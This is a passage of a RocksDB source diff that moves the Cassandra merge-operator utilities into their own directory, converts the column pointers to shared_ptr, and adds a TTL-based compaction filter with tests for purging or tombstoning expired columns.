+1,39 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). + +#pragma once +#include +#include "rocksdb/compaction_filter.h" +#include "rocksdb/slice.h" + +namespace rocksdb { +namespace cassandra { + +/** + * Compaction filter for removing expired Cassandra data with ttl. + * If option `purge_ttl_on_expiration` is set to true, expired data + * will be directly purged. Otherwise expired data will be converted + * tombstones first, then be eventally removed after gc grace period. + * `purge_ttl_on_expiration` should only be on in the case all the + * writes have same ttl setting, otherwise it could bring old data back. + */ +class CassandraCompactionFilter : public CompactionFilter { +public: + explicit CassandraCompactionFilter(bool purge_ttl_on_expiration) + : purge_ttl_on_expiration_(purge_ttl_on_expiration) {} + + const char* Name() const override; + virtual Decision FilterV2(int level, + const Slice& key, + ValueType value_type, + const Slice& existing_value, + std::string* new_value, + std::string* skip_until) const override; + +private: + bool purge_ttl_on_expiration_; +}; +} // namespace cassandra +} // namespace rocksdb diff --git a/utilities/merge_operators/cassandra/cassandra_format_test.cc b/utilities/cassandra/cassandra_format_test.cc similarity index 80% rename from utilities/merge_operators/cassandra/cassandra_format_test.cc rename to utilities/cassandra/cassandra_format_test.cc index 866098a1b09..0cf124d0cab 100644 --- a/utilities/merge_operators/cassandra/cassandra_format_test.cc +++ b/utilities/cassandra/cassandra_format_test.cc @@ -2,14 +2,13 @@ // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. #include #include #include "util/testharness.h" -#include "utilities/merge_operators/cassandra/format.h" -#include "utilities/merge_operators/cassandra/serialize.h" +#include "utilities/cassandra/format.h" +#include "utilities/cassandra/serialize.h" +#include "utilities/cassandra/test_utils.h" using namespace rocksdb::cassandra; @@ -46,7 +45,7 @@ TEST(ColumnTest, Column) { // Verify the deserialization. std::string saved_dest = dest; - std::unique_ptr c1 = Column::Deserialize(saved_dest.c_str(), 0); + std::shared_ptr c1 = Column::Deserialize(saved_dest.c_str(), 0); EXPECT_EQ(c1->Index(), index); EXPECT_EQ(c1->Timestamp(), timestamp); EXPECT_EQ(c1->Size(), 14 + sizeof(data)); @@ -58,7 +57,7 @@ TEST(ColumnTest, Column) { // Verify the ColumnBase::Deserialization. saved_dest = dest; - std::unique_ptr c2 = + std::shared_ptr c2 = ColumnBase::Deserialize(saved_dest.c_str(), c.Size()); c2->Serialize(&dest); EXPECT_EQ(dest.size(), 3 * c.Size()); @@ -101,7 +100,7 @@ TEST(ExpiringColumnTest, ExpiringColumn) { // Verify the deserialization. std::string saved_dest = dest; - std::unique_ptr c1 = + std::shared_ptr c1 = ExpiringColumn::Deserialize(saved_dest.c_str(), 0); EXPECT_EQ(c1->Index(), index); EXPECT_EQ(c1->Timestamp(), timestamp); @@ -114,7 +113,7 @@ TEST(ExpiringColumnTest, ExpiringColumn) { // Verify the ColumnBase::Deserialization. saved_dest = dest; - std::unique_ptr c2 = + std::shared_ptr c2 = ColumnBase::Deserialize(saved_dest.c_str(), c.Size()); c2->Serialize(&dest); EXPECT_EQ(dest.size(), 3 * c.Size()); @@ -151,7 +150,7 @@ TEST(TombstoneTest, Tombstone) { EXPECT_EQ(Deserialize(dest.c_str(), offset), marked_for_delete_at); // Verify the deserialization. - std::unique_ptr c1 = Tombstone::Deserialize(dest.c_str(), 0); + std::shared_ptr c1 = Tombstone::Deserialize(dest.c_str(), 0); EXPECT_EQ(c1->Index(), index); EXPECT_EQ(c1->Timestamp(), marked_for_delete_at); EXPECT_EQ(c1->Size(), 14); @@ -162,7 +161,7 @@ TEST(TombstoneTest, Tombstone) { std::memcmp(dest.c_str(), dest.c_str() + c.Size(), c.Size()) == 0); // Verify the ColumnBase::Deserialization. - std::unique_ptr c2 = + std::shared_ptr c2 = ColumnBase::Deserialize(dest.c_str(), c.Size()); c2->Serialize(&dest); EXPECT_EQ(dest.size(), 3 * c.Size()); @@ -204,7 +203,7 @@ TEST(RowValueTest, RowTombstone) { } TEST(RowValueTest, RowWithColumns) { - std::vector> columns; + std::vector> columns; int64_t last_modified_time = 1494022807048; std::size_t columns_data_size = 0; @@ -212,7 +211,7 @@ TEST(RowValueTest, RowWithColumns) { int8_t e_index = 0; int64_t e_timestamp = 1494022807044; int32_t e_ttl = 3600; - columns.push_back(std::unique_ptr( + columns.push_back(std::shared_ptr( new ExpiringColumn(ColumnTypeMask::EXPIRATION_MASK, e_index, e_timestamp, sizeof(e_data), e_data, e_ttl))); columns_data_size += columns[0]->Size(); @@ -220,14 +219,14 @@ TEST(RowValueTest, RowWithColumns) { char c_data[4] = {'d', 'a', 't', 'a'}; int8_t c_index = 1; int64_t c_timestamp = 1494022807048; - columns.push_back(std::unique_ptr( + columns.push_back(std::shared_ptr( new Column(0, c_index, c_timestamp, sizeof(c_data), c_data))); columns_data_size += columns[1]->Size(); int8_t t_index = 2; int32_t t_local_deletion_time = 1494022801; int64_t t_marked_for_delete_at = 1494022807043; - columns.push_back(std::unique_ptr( + columns.push_back(std::shared_ptr( new Tombstone(ColumnTypeMask::DELETION_MASK, t_index, t_local_deletion_time, t_marked_for_delete_at))); columns_data_size += columns[2]->Size(); @@ -301,6 +300,50 @@ TEST(RowValueTest, RowWithColumns) { std::memcmp(dest.c_str(), dest.c_str() + r.Size(), r.Size()) == 0); } +TEST(RowValueTest, PurgeTtlShouldRemvoeAllColumnsExpired) { + int64_t now = time(nullptr); + + auto row_value = CreateTestRowValue({ + std::make_tuple(kColumn, 0, ToMicroSeconds(now)), + std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now - kTtl - 10)), //expired + std::make_tuple(kExpiringColumn, 2, ToMicroSeconds(now)), // not expired + std::make_tuple(kTombstone, 3, ToMicroSeconds(now)) + }); + + bool changed = false; + auto purged = row_value.PurgeTtl(&changed); + EXPECT_TRUE(changed); + EXPECT_EQ(purged.columns_.size(), 3); + VerifyRowValueColumns(purged.columns_, 0, kColumn, 0, ToMicroSeconds(now)); + VerifyRowValueColumns(purged.columns_, 1, kExpiringColumn, 2, ToMicroSeconds(now)); + VerifyRowValueColumns(purged.columns_, 2, kTombstone, 3, ToMicroSeconds(now)); + + purged.PurgeTtl(&changed); + EXPECT_FALSE(changed); +} + +TEST(RowValueTest, ExpireTtlShouldConvertExpiredColumnsToTombstones) { + int64_t now = time(nullptr); + + auto row_value = CreateTestRowValue({ + std::make_tuple(kColumn, 0, ToMicroSeconds(now)), + std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now - kTtl - 10)), //expired + std::make_tuple(kExpiringColumn, 2, ToMicroSeconds(now)), // not expired + std::make_tuple(kTombstone, 3, ToMicroSeconds(now)) + }); + + bool changed = false; + auto compacted = row_value.ExpireTtl(&changed); + EXPECT_TRUE(changed); + EXPECT_EQ(compacted.columns_.size(), 4); + VerifyRowValueColumns(compacted.columns_, 0, kColumn, 0, ToMicroSeconds(now)); + VerifyRowValueColumns(compacted.columns_, 1, kTombstone, 1, ToMicroSeconds(now - 10)); + VerifyRowValueColumns(compacted.columns_, 2, kExpiringColumn, 2, ToMicroSeconds(now)); + VerifyRowValueColumns(compacted.columns_, 3, kTombstone, 3, ToMicroSeconds(now)); + + compacted.ExpireTtl(&changed); + EXPECT_FALSE(changed); +} } // namespace cassandra } // namespace rocksdb diff --git a/utilities/cassandra/cassandra_functional_test.cc b/utilities/cassandra/cassandra_functional_test.cc new file mode 100644 index 00000000000..0c02228a7f9 --- /dev/null +++ b/utilities/cassandra/cassandra_functional_test.cc @@ -0,0 +1,251 @@ +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). + +#include +#include "rocksdb/db.h" +#include "db/db_impl.h" +#include "rocksdb/merge_operator.h" +#include "rocksdb/utilities/db_ttl.h" +#include "util/testharness.h" +#include "util/random.h" +#include "utilities/merge_operators.h" +#include "utilities/cassandra/cassandra_compaction_filter.h" +#include "utilities/cassandra/merge_operator.h" +#include "utilities/cassandra/test_utils.h" + +using namespace rocksdb; + +namespace rocksdb { +namespace cassandra { + +// Path to the database on file system +const std::string kDbName = test::TmpDir() + "/cassandra_functional_test"; + +class CassandraStore { + public: + explicit CassandraStore(std::shared_ptr db) + : db_(db), + merge_option_(), + get_option_() { + assert(db); + } + + bool Append(const std::string& key, const RowValue& val){ + std::string result; + val.Serialize(&result); + Slice valSlice(result.data(), result.size()); + auto s = db_->Merge(merge_option_, key, valSlice); + + if (s.ok()) { + return true; + } else { + std::cerr << "ERROR " << s.ToString() << std::endl; + return false; + } + } + + void Flush() { + dbfull()->TEST_FlushMemTable(); + dbfull()->TEST_WaitForCompact(); + } + + void Compact() { + dbfull()->TEST_CompactRange( + 0, nullptr, nullptr, db_->DefaultColumnFamily()); + } + + std::tuple Get(const std::string& key){ + std::string result; + auto s = db_->Get(get_option_, key, &result); + + if (s.ok()) { + return std::make_tuple(true, + RowValue::Deserialize(result.data(), + result.size())); + } + + if (!s.IsNotFound()) { + std::cerr << "ERROR " << s.ToString() << std::endl; + } + + return std::make_tuple(false, RowValue(0, 0)); + } + + private: + std::shared_ptr db_; + WriteOptions merge_option_; + ReadOptions get_option_; + + DBImpl* dbfull() { return reinterpret_cast(db_.get()); } + +}; + +class TestCompactionFilterFactory : public CompactionFilterFactory { +public: + explicit TestCompactionFilterFactory(bool purge_ttl_on_expiration) + : purge_ttl_on_expiration_(purge_ttl_on_expiration) {} + + virtual std::unique_ptr CreateCompactionFilter( + const CompactionFilter::Context& context) override { + return unique_ptr(new CassandraCompactionFilter(purge_ttl_on_expiration_)); + } + + virtual const char* Name() const override { + return "TestCompactionFilterFactory"; + } + +private: + bool purge_ttl_on_expiration_; +}; + + +// The class for unit-testing +class CassandraFunctionalTest : public testing::Test { +public: + CassandraFunctionalTest() { + DestroyDB(kDbName, Options()); // Start each test with a fresh DB + } + + std::shared_ptr OpenDb() { + DB* db; + Options options; + options.create_if_missing = true; + options.merge_operator.reset(new CassandraValueMergeOperator()); + auto* cf_factory = new TestCompactionFilterFactory(purge_ttl_on_expiration_); + options.compaction_filter_factory.reset(cf_factory); + EXPECT_OK(DB::Open(options, kDbName, &db)); + return std::shared_ptr(db); + } + + bool purge_ttl_on_expiration_ = false; +}; + +// THE TEST CASES BEGIN HERE + +TEST_F(CassandraFunctionalTest, SimpleMergeTest) { + CassandraStore store(OpenDb()); + + store.Append("k1", CreateTestRowValue({ + std::make_tuple(kTombstone, 0, 5), + std::make_tuple(kColumn, 1, 8), + std::make_tuple(kExpiringColumn, 2, 5), + })); + store.Append("k1",CreateTestRowValue({ + std::make_tuple(kColumn, 0, 2), + std::make_tuple(kExpiringColumn, 1, 5), + std::make_tuple(kTombstone, 2, 7), + std::make_tuple(kExpiringColumn, 7, 17), + })); + store.Append("k1", CreateTestRowValue({ + std::make_tuple(kExpiringColumn, 0, 6), + std::make_tuple(kTombstone, 1, 5), + std::make_tuple(kColumn, 2, 4), + std::make_tuple(kTombstone, 11, 11), + })); + + auto ret = store.Get("k1"); + + ASSERT_TRUE(std::get<0>(ret)); + RowValue& merged = std::get<1>(ret); + EXPECT_EQ(merged.columns_.size(), 5); + VerifyRowValueColumns(merged.columns_, 0, kExpiringColumn, 0, 6); + VerifyRowValueColumns(merged.columns_, 1, kColumn, 1, 8); + VerifyRowValueColumns(merged.columns_, 2, kTombstone, 2, 7); + VerifyRowValueColumns(merged.columns_, 3, kExpiringColumn, 7, 17); + VerifyRowValueColumns(merged.columns_, 4, kTombstone, 11, 11); +} + +TEST_F(CassandraFunctionalTest, + CompactionShouldConvertExpiredColumnsToTombstone) { + CassandraStore store(OpenDb()); + int64_t now= time(nullptr); + + store.Append("k1", CreateTestRowValue({ + std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 20)), //expired + std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now - kTtl + 10)), // not expired + std::make_tuple(kTombstone, 3, ToMicroSeconds(now)) + })); + + store.Flush(); + + store.Append("k1",CreateTestRowValue({ + std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 10)), //expired + std::make_tuple(kColumn, 2, ToMicroSeconds(now)) + })); + + store.Flush(); + store.Compact(); + + auto ret = store.Get("k1"); + ASSERT_TRUE(std::get<0>(ret)); + RowValue& merged = std::get<1>(ret); + EXPECT_EQ(merged.columns_.size(), 4); + VerifyRowValueColumns(merged.columns_, 0, kTombstone, 0, ToMicroSeconds(now - 10)); + VerifyRowValueColumns(merged.columns_, 1, kExpiringColumn, 1, ToMicroSeconds(now - kTtl + 10)); + VerifyRowValueColumns(merged.columns_, 2, kColumn, 2, ToMicroSeconds(now)); + VerifyRowValueColumns(merged.columns_, 3, kTombstone, 3, ToMicroSeconds(now)); +} + + +TEST_F(CassandraFunctionalTest, + CompactionShouldPurgeExpiredColumnsIfPurgeTtlIsOn) { + purge_ttl_on_expiration_ = true; + CassandraStore store(OpenDb()); + int64_t now = time(nullptr); + + store.Append("k1", CreateTestRowValue({ + std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 20)), //expired + std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now)), // not expired + std::make_tuple(kTombstone, 3, ToMicroSeconds(now)) + })); + + store.Flush(); + + store.Append("k1",CreateTestRowValue({ + std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 10)), //expired + std::make_tuple(kColumn, 2, ToMicroSeconds(now)) + })); + + store.Flush(); + store.Compact(); + + auto ret = store.Get("k1"); + ASSERT_TRUE(std::get<0>(ret)); + RowValue& merged = std::get<1>(ret); + EXPECT_EQ(merged.columns_.size(), 3); + VerifyRowValueColumns(merged.columns_, 0, kExpiringColumn, 1, ToMicroSeconds(now)); + VerifyRowValueColumns(merged.columns_, 1, kColumn, 2, ToMicroSeconds(now)); + VerifyRowValueColumns(merged.columns_, 2, kTombstone, 3, ToMicroSeconds(now)); +} + +TEST_F(CassandraFunctionalTest, + CompactionShouldRemoveRowWhenAllColumnsExpiredIfPurgeTtlIsOn) { + purge_ttl_on_expiration_ = true; + CassandraStore store(OpenDb()); + int64_t now = time(nullptr); + + store.Append("k1", CreateTestRowValue({ + std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 20)), + std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now - kTtl - 20)), + })); + + store.Flush(); + + store.Append("k1",CreateTestRowValue({ + std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 10)), + })); + + store.Flush(); + store.Compact(); + ASSERT_FALSE(std::get<0>(store.Get("k1"))); +} + +} // namespace cassandra +} // namespace rocksdb + +int main(int argc, char** argv) { + ::testing::InitGoogleTest(&argc, argv); + return RUN_ALL_TESTS(); +} diff --git a/utilities/merge_operators/cassandra/cassandra_row_merge_test.cc b/utilities/cassandra/cassandra_row_merge_test.cc similarity index 92% rename from utilities/merge_operators/cassandra/cassandra_row_merge_test.cc rename to utilities/cassandra/cassandra_row_merge_test.cc index 76d112c7b03..78c7d8e5786 100644 --- a/utilities/merge_operators/cassandra/cassandra_row_merge_test.cc +++ b/utilities/cassandra/cassandra_row_merge_test.cc @@ -2,13 +2,11 @@ // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. #include #include "util/testharness.h" -#include "utilities/merge_operators/cassandra/format.h" -#include "utilities/merge_operators/cassandra/test_utils.h" +#include "utilities/cassandra/format.h" +#include "utilities/cassandra/test_utils.h" namespace rocksdb { namespace cassandra { diff --git a/utilities/merge_operators/cassandra/cassandra_serialize_test.cc b/utilities/cassandra/cassandra_serialize_test.cc similarity index 96% rename from utilities/merge_operators/cassandra/cassandra_serialize_test.cc rename to utilities/cassandra/cassandra_serialize_test.cc index 978878b64f8..68d2c163d96 100644 --- a/utilities/merge_operators/cassandra/cassandra_serialize_test.cc +++ b/utilities/cassandra/cassandra_serialize_test.cc @@ -2,11 +2,9 @@ // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. #include "util/testharness.h" -#include "utilities/merge_operators/cassandra/serialize.h" +#include "utilities/cassandra/serialize.h" using namespace rocksdb::cassandra; diff --git a/utilities/merge_operators/cassandra/format.cc b/utilities/cassandra/format.cc similarity index 75% rename from utilities/merge_operators/cassandra/format.cc rename to utilities/cassandra/format.cc index 01eff67e3ef..2b096cdbb96 100644 --- a/utilities/merge_operators/cassandra/format.cc +++ b/utilities/cassandra/format.cc @@ -2,8 +2,6 @@ // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. #include "format.h" @@ -11,7 +9,7 @@ #include #include -#include "utilities/merge_operators/cassandra/serialize.h" +#include "utilities/cassandra/serialize.h" namespace rocksdb { namespace cassandra { @@ -42,7 +40,7 @@ void ColumnBase::Serialize(std::string* dest) const { rocksdb::cassandra::Serialize(index_, dest); } -std::unique_ptr ColumnBase::Deserialize(const char* src, +std::shared_ptr ColumnBase::Deserialize(const char* src, std::size_t offset) { int8_t mask = rocksdb::cassandra::Deserialize(src, offset); if ((mask & ColumnTypeMask::DELETION_MASK) != 0) { @@ -79,7 +77,7 @@ void Column::Serialize(std::string* dest) const { dest->append(value_, value_size_); } -std::unique_ptr Column::Deserialize(const char *src, +std::shared_ptr Column::Deserialize(const char *src, std::size_t offset) { int8_t mask = rocksdb::cassandra::Deserialize(src, offset); offset += sizeof(mask); @@ -89,8 +87,8 @@ std::unique_ptr Column::Deserialize(const char *src, offset += sizeof(timestamp); int32_t value_size = rocksdb::cassandra::Deserialize(src, offset); offset += sizeof(value_size); - return std::unique_ptr( - new Column(mask, index, timestamp, value_size, src + offset)); + return std::make_shared( + mask, index, timestamp, value_size, src + offset); } ExpiringColumn::ExpiringColumn( @@ -112,7 +110,32 @@ void ExpiringColumn::Serialize(std::string* dest) const { rocksdb::cassandra::Serialize(ttl_, dest); } -std::unique_ptr ExpiringColumn::Deserialize( +std::chrono::time_point ExpiringColumn::TimePoint() const { + return std::chrono::time_point(std::chrono::microseconds(Timestamp())); +} + +std::chrono::seconds ExpiringColumn::Ttl() const { + return std::chrono::seconds(ttl_); +} + +bool ExpiringColumn::Expired() const { + return TimePoint() + Ttl() < std::chrono::system_clock::now(); +} + +std::shared_ptr ExpiringColumn::ToTombstone() const { + auto expired_at = (TimePoint() + Ttl()).time_since_epoch(); + int32_t local_deletion_time = static_cast( + std::chrono::duration_cast(expired_at).count()); + int64_t marked_for_delete_at = + std::chrono::duration_cast(expired_at).count(); + return std::make_shared( + ColumnTypeMask::DELETION_MASK, + Index(), + local_deletion_time, + marked_for_delete_at); +} + +std::shared_ptr ExpiringColumn::Deserialize( const char *src, std::size_t offset) { int8_t mask = rocksdb::cassandra::Deserialize(src, offset); @@ -126,8 +149,8 @@ std::unique_ptr ExpiringColumn::Deserialize( const char* value = src + offset; offset += value_size; int32_t ttl = rocksdb::cassandra::Deserialize(src, offset); - return std::unique_ptr( - new ExpiringColumn(mask, index, timestamp, value_size, value, ttl)); + return std::make_shared( + mask, index, timestamp, value_size, value, ttl); } Tombstone::Tombstone( @@ -153,7 +176,7 @@ void Tombstone::Serialize(std::string* dest) const { rocksdb::cassandra::Serialize(marked_for_delete_at_, dest); } -std::unique_ptr Tombstone::Deserialize(const char *src, +std::shared_ptr Tombstone::Deserialize(const char *src, std::size_t offset) { int8_t mask = rocksdb::cassandra::Deserialize(src, offset); offset += sizeof(mask); @@ -164,8 +187,8 @@ std::unique_ptr Tombstone::Deserialize(const char *src, offset += sizeof(int32_t); int64_t marked_for_delete_at = rocksdb::cassandra::Deserialize(src, offset); - return std::unique_ptr( - new Tombstone(mask, index, local_deletion_time, marked_for_delete_at)); + return std::make_shared( + mask, index, local_deletion_time, marked_for_delete_at); } RowValue::RowValue(int32_t local_deletion_time, int64_t marked_for_delete_at) @@ -173,7 +196,7 @@ RowValue::RowValue(int32_t local_deletion_time, int64_t marked_for_delete_at) marked_for_delete_at_(marked_for_delete_at), columns_(), last_modified_time_(0) {} -RowValue::RowValue(std::vector> columns, +RowValue::RowValue(Columns columns, int64_t last_modified_time) : local_deletion_time_(kDefaultLocalDeletionTime), marked_for_delete_at_(kDefaultMarkedForDeleteAt), @@ -208,6 +231,49 @@ void RowValue::Serialize(std::string* dest) const { } } +RowValue RowValue::PurgeTtl(bool* changed) const { + *changed = false; + Columns new_columns; + for (auto& column : columns_) { + if(column->Mask() == ColumnTypeMask::EXPIRATION_MASK) { + std::shared_ptr expiring_column = + std::static_pointer_cast(column); + + if(expiring_column->Expired()){ + *changed = true; + continue; + } + } + + new_columns.push_back(column); + } + return RowValue(std::move(new_columns), last_modified_time_); +} + +RowValue RowValue::ExpireTtl(bool* changed) const { + *changed = false; + Columns new_columns; + for (auto& column : columns_) { + if(column->Mask() == ColumnTypeMask::EXPIRATION_MASK) { + std::shared_ptr expiring_column = + std::static_pointer_cast(column); + + if(expiring_column->Expired()) { + shared_ptr tombstone = expiring_column->ToTombstone(); + new_columns.push_back(tombstone); + *changed = true; + continue; + } + } + new_columns.push_back(column); + } + return RowValue(std::move(new_columns), last_modified_time_); +} + +bool RowValue::Empty() const { + return columns_.empty(); +} + RowValue RowValue::Deserialize(const char *src, std::size_t size) { std::size_t offset = 0; assert(size >= sizeof(local_deletion_time_) + sizeof(marked_for_delete_at_)); @@ -223,7 +289,7 @@ RowValue RowValue::Deserialize(const char *src, std::size_t size) { assert(local_deletion_time == kDefaultLocalDeletionTime); assert(marked_for_delete_at == kDefaultMarkedForDeleteAt); - std::vector> columns; + Columns columns; int64_t last_modified_time = 0; while (offset < size) { auto c = ColumnBase::Deserialize(src, offset); @@ -254,7 +320,7 @@ RowValue RowValue::Merge(std::vector&& values) { return r1.LastModifiedTime() > r2.LastModifiedTime(); }); - std::map> merged_columns; + std::map> merged_columns; int64_t tombstone_timestamp = 0; for (auto& value : values) { @@ -268,17 +334,17 @@ RowValue RowValue::Merge(std::vector&& values) { for (auto& column : value.columns_) { int8_t index = column->Index(); if (merged_columns.find(index) == merged_columns.end()) { - merged_columns[index] = std::move(column); + merged_columns[index] = column; } else { if (column->Timestamp() > merged_columns[index]->Timestamp()) { - merged_columns[index] = std::move(column); + merged_columns[index] = column; } } } } int64_t last_modified_time = 0; - std::vector> columns; + Columns columns; for (auto& pair: merged_columns) { // For some row, its last_modified_time > row tombstone_timestamp, but // it might have rows whose timestamp is ealier than tombstone, so we diff --git a/utilities/merge_operators/cassandra/format.h b/utilities/cassandra/format.h similarity index 80% rename from utilities/merge_operators/cassandra/format.h rename to utilities/cassandra/format.h index 0ffd9a5bb98..d8f51df1492 100644 --- a/utilities/merge_operators/cassandra/format.h +++ b/utilities/cassandra/format.h @@ -2,8 +2,6 @@ // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. /** * The encoding of Cassandra Row Value. @@ -57,6 +55,7 @@ */ #pragma once +#include #include #include #include "rocksdb/merge_operator.h" @@ -72,6 +71,7 @@ enum ColumnTypeMask { EXPIRATION_MASK = 0x02, }; + class ColumnBase { public: ColumnBase(int8_t mask, int8_t index); @@ -82,8 +82,7 @@ class ColumnBase { virtual int8_t Index() const; virtual std::size_t Size() const; virtual void Serialize(std::string* dest) const; - - static std::unique_ptr Deserialize(const char* src, + static std::shared_ptr Deserialize(const char* src, std::size_t offset); private: @@ -99,8 +98,7 @@ class Column : public ColumnBase { virtual int64_t Timestamp() const override; virtual std::size_t Size() const override; virtual void Serialize(std::string* dest) const override; - - static std::unique_ptr Deserialize(const char* src, + static std::shared_ptr Deserialize(const char* src, std::size_t offset); private: @@ -109,44 +107,50 @@ class Column : public ColumnBase { const char* value_; }; -class ExpiringColumn : public Column { +class Tombstone : public ColumnBase { public: - ExpiringColumn(int8_t mask, int8_t index, int64_t timestamp, - int32_t value_size, const char* value, int32_t ttl); + Tombstone(int8_t mask, int8_t index, + int32_t local_deletion_time, int64_t marked_for_delete_at); + virtual int64_t Timestamp() const override; virtual std::size_t Size() const override; virtual void Serialize(std::string* dest) const override; - static std::unique_ptr Deserialize(const char* src, - std::size_t offset); + static std::shared_ptr Deserialize(const char* src, + std::size_t offset); private: - int32_t ttl_; + int32_t local_deletion_time_; + int64_t marked_for_delete_at_; }; -class Tombstone : public ColumnBase { +class ExpiringColumn : public Column { public: - Tombstone(int8_t mask, int8_t index, - int32_t local_deletion_time, int64_t marked_for_delete_at); + ExpiringColumn(int8_t mask, int8_t index, int64_t timestamp, + int32_t value_size, const char* value, int32_t ttl); - virtual int64_t Timestamp() const override; virtual std::size_t Size() const override; virtual void Serialize(std::string* dest) const override; + bool Expired() const; + std::shared_ptr ToTombstone() const; - static std::unique_ptr Deserialize(const char* src, - std::size_t offset); + static std::shared_ptr Deserialize(const char* src, + std::size_t offset); private: - int32_t local_deletion_time_; - int64_t marked_for_delete_at_; + int32_t ttl_; + std::chrono::time_point TimePoint() const; + std::chrono::seconds Ttl() const; }; +typedef std::vector> Columns; + class RowValue { public: // Create a Row Tombstone. RowValue(int32_t local_deletion_time, int64_t marked_for_delete_at); // Create a Row containing columns. - RowValue(std::vector> columns, + RowValue(Columns columns, int64_t last_modified_time); RowValue(const RowValue& that) = delete; RowValue(RowValue&& that) noexcept = default; @@ -159,6 +163,9 @@ class RowValue { // otherwise it returns the max timestamp of containing columns. int64_t LastModifiedTime() const; void Serialize(std::string* dest) const; + RowValue PurgeTtl(bool* changed) const; + RowValue ExpireTtl(bool* changed) const; + bool Empty() const; static RowValue Deserialize(const char* src, std::size_t size); // Merge multiple rows according to their timestamp. @@ -167,12 +174,20 @@ class RowValue { private: int32_t local_deletion_time_; int64_t marked_for_delete_at_; - std::vector> columns_; + Columns columns_; int64_t last_modified_time_; + FRIEND_TEST(RowValueTest, PurgeTtlShouldRemvoeAllColumnsExpired); + FRIEND_TEST(RowValueTest, ExpireTtlShouldConvertExpiredColumnsToTombstones); FRIEND_TEST(RowValueMergeTest, Merge); FRIEND_TEST(RowValueMergeTest, MergeWithRowTombstone); - FRIEND_TEST(CassandraMergeTest, SimpleTest); + FRIEND_TEST(CassandraFunctionalTest, SimpleMergeTest); + FRIEND_TEST( + CassandraFunctionalTest, CompactionShouldConvertExpiredColumnsToTombstone); + FRIEND_TEST( + CassandraFunctionalTest, CompactionShouldPurgeExpiredColumnsIfPurgeTtlIsOn); + FRIEND_TEST( + CassandraFunctionalTest, CompactionShouldRemoveRowWhenAllColumnExpiredIfPurgeTtlIsOn); }; } // namepsace cassandrda diff --git a/utilities/merge_operators/cassandra/merge_operator.cc b/utilities/cassandra/merge_operator.cc similarity index 98% rename from utilities/merge_operators/cassandra/merge_operator.cc rename to utilities/cassandra/merge_operator.cc index 03b4ec2e39f..75817a78b28 100644 --- a/utilities/merge_operators/cassandra/merge_operator.cc +++ b/utilities/cassandra/merge_operator.cc @@ -13,7 +13,7 @@ #include "rocksdb/slice.h" #include "rocksdb/merge_operator.h" #include "utilities/merge_operators.h" -#include "utilities/merge_operators/cassandra/format.h" +#include "utilities/cassandra/format.h" namespace rocksdb { namespace cassandra { diff --git a/utilities/merge_operators/cassandra/merge_operator.h b/utilities/cassandra/merge_operator.h similarity index 100% rename from utilities/merge_operators/cassandra/merge_operator.h rename to utilities/cassandra/merge_operator.h diff --git a/utilities/merge_operators/cassandra/serialize.h b/utilities/cassandra/serialize.h similarity index 100% rename from utilities/merge_operators/cassandra/serialize.h rename to utilities/cassandra/serialize.h diff --git a/utilities/merge_operators/cassandra/test_utils.cc b/utilities/cassandra/test_utils.cc similarity index 73% rename from utilities/merge_operators/cassandra/test_utils.cc rename to utilities/cassandra/test_utils.cc index 91b9e634974..68d0381e0e5 100644 --- a/utilities/merge_operators/cassandra/test_utils.cc +++ b/utilities/cassandra/test_utils.cc @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under both the GPLv2 (found in the -// COPYING file in the root directory) and Apache 2.0 License -// (found in the LICENSE.Apache file in the root directory). +// This source code is licensed under the BSD-style license found in the +// LICENSE file in the root directory of this source tree. An additional grant +// of patent rights can be found in the PATENTS file in the same directory. // This source code is also licensed under the GPLv2 license found in the // COPYING file in the root directory of this source tree. @@ -12,29 +12,29 @@ namespace cassandra { const char kData[] = {'d', 'a', 't', 'a'}; const char kExpiringData[] = {'e', 'd', 'a', 't', 'a'}; const int32_t kLocalDeletionTime = 1; -const int32_t kTtl = 100; +const int32_t kTtl = 86400; const int8_t kColumn = 0; const int8_t kTombstone = 1; const int8_t kExpiringColumn = 2; -std::unique_ptr CreateTestColumn(int8_t mask, +std::shared_ptr CreateTestColumn(int8_t mask, int8_t index, int64_t timestamp) { if ((mask & ColumnTypeMask::DELETION_MASK) != 0) { - return std::unique_ptr(new Tombstone( + return std::shared_ptr(new Tombstone( mask, index, kLocalDeletionTime, timestamp)); } else if ((mask & ColumnTypeMask::EXPIRATION_MASK) != 0) { - return std::unique_ptr(new ExpiringColumn( + return std::shared_ptr(new ExpiringColumn( mask, index, timestamp, sizeof(kExpiringData), kExpiringData, kTtl)); 